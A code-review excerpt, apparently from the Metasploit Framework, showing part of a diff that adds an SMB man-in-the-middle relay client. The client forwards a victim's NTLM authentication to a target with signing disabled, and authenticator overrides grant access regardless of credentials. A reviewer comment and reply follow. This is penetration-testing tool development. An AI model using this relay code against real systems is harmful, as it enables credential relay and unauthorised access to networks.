lib/msf/core/exploit/remote/smb/mitm/mitm_server_client.rb

```diff
@@ -0,0 +1,379 @@
+        # Additionally, we need to have the type3 message created using the @ntlm_client.session object
+        #   this may require rummaging around in the guts of @ntlm_client and it's session to figure out how
+        #   to do that
+        #
+        # @server_type3_message = @ntlm_client.init_context(type2_ntlm_message)
+        #
+        # @session_key = @ntlm_client.session_key
+        # server_type2_message = @ntlm_client.session.challenge_message
+        # store_target_info(server_type2_message.target_info) if server_type2_message.has_flag?(:TARGET_INFO)
+        # @os_version = extract_os_version(server_type2_message.os_version.to_s) unless server_type2_message.os_version.empty?
+      end
+    rescue ::Exception => e
+      msg = "Unable to retrieve server challenge at #{self.target.ip}:#{self.target.port}"
+      elog(msg, error: e)
+      print_warning msg
+    end
+
+    def send_auth_attempt(victim_type3_message)
+      if @version == 'SMB1'
+        # TODO
+      else
+        packet = RubySMB::SMB2::Packet::SessionSetupRequest.new
+
+        packet.smb2_header.session_id = @session_id
+        packet.smb2_header.credits = 127
+
+        packet.security_mode.signing_enabled = 0
+
+        packet.set_ntlm_type3_blob(victim_type3_message)
+
+        response = send_recv(packet)
+        if @dialect == '0x0311'
+          update_preauth_hash(packet)
+        end
+
+        # raw = smb2_ntlmssp_authenticate(victim_type3_message, @session_id)
+        response = smb2_ntlmssp_final_packet(response)
+
+        if @smb3 && !@session_encrypt_data && response.session_flags.encrypt_data == 1
+          @session_encrypt_data = true
+        end
+
+        response
+      end
+    rescue ::Exception => e
+      msg = "Unable to retrieve server challenge at #{self.target.ip}:#{self.target.port}"
+      elog(msg, error: e)
+      print_warning msg
+    end
+
+    def normalize_type3_encoding(type3_msg)
+      type3_msg.security_buffers.map!{ |_buffer_name, security_buffer| security_buffer.value.force_encoding("ASCII-8BIT") }
+    end
+
+    alias :connect :tree_connect
+  end
+
+  # An override for the default RubySMB NTLM Authenticator to always grant access,
+  # regardless of the provided credentials
+  # TODO: Delete when RubySMB supports logging in without validated credentials
+  class AlwaysGrantAccessGssAuthenticator < ::RubySMB::Gss::Provider::NTLM::Authenticator
+    def process_ntlm_type3(type3_msg)
+      # Override the ntlm type3 validation for now, as the current implementation of the
+      # parent class validates user accounts, and doesn't support logging in without valid creds
+      ::WindowsError::NTStatus::STATUS_SUCCESS
+    end
+  end
+
+  #
+  # An override for the default RubySMB NTLM Provider to always grant access,
+  # regardless of the provided credentials
+  # TODO: Delete when RubySMB supports logging in without validated credentials
+  class AlwaysGrantAccessGssProvider < ::RubySMB::Gss::Provider::NTLM
```

Comment:
Similar to the above comment, I think a good end goal is deleting this Authenticator

Reply:
We agreed to keep this, and keep such logic out of ruby_smb